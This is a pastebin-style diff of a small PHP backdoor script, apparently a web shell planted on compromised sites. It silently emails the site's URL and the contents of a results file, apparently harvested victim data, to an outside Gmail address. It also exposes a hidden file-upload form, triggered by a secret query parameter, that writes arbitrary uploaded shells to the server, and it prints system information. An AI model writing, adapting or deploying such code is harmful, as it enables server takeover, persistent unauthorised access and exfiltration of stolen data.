SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | set_time_limit(0); | |
| 3 | error_reporting(0); | |
| 4 | $ss = $_SERVER['REMOTE_ADDR']; | |
| 5 | $to .= 'havij.exe@gmail.com'; | |
| 6 | - | $subject = 'PPL LOGIN FROM | '.$ss.''; |
| 6 | + | $subject = 'Result Full FROM | '.$ss.''; |
| 7 | - | $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?wlad=l9hab"."\r\n |
| 7 | + | $message = "Link Shells : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?sexter"."\r\n |
| 8 | \n"."_________________________________". file_get_contents("resulte.txt") . "\n";
| |
| 9 | $headers = 'MIME-Version: 1.0' . "\r\n"; | |
| 10 | $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; | |
| 11 | $headers .= 'From: Dexter <localhost>' . "\r\n"; | |
| 12 | mail($to, $subject, $message, $headers); | |
| 13 | ||
| 14 | - | $nemo = $_GET['wlad']; |
| 14 | + | if(isset($_GET["sexter"])) |
| 15 | - | if($nemo == 'l9hab'){
|
| 15 | + | {
|
| 16 | - | $nemoshell = $_FILES['file']['name']; |
| 16 | + | echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]"; |
| 17 | - | $nemohero = $_FILES['file']['tmp_name']; |
| 17 | + | print "\n";$disable_functions = @ini_get("disable_functions");
|
| 18 | - | echo "<form method='POST' enctype='multipart/form-data'> |
| 18 | + | echo "DisablePHP=".$disable_functions; print "\n"; |
| 19 | - | <input type='file'name='file' /> |
| 19 | + | echo"<form method=post enctype=multipart/form-data>"; |
| 20 | - | <input type='submit' value='upload shell' /> |
| 20 | + | echo"<input type=file name=f><input name=v type=submit id=v value=up><br>"; |
| 21 | - | </form>"; |
| 21 | + | if($_POST["v"]==up) |
| 22 | - | move_uploaded_file($nemohero,$nemoshell); |
| 22 | + | { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
|
| 23 | - | } |
| 23 | + | |
| 24 | ||
| 25 | ?> |
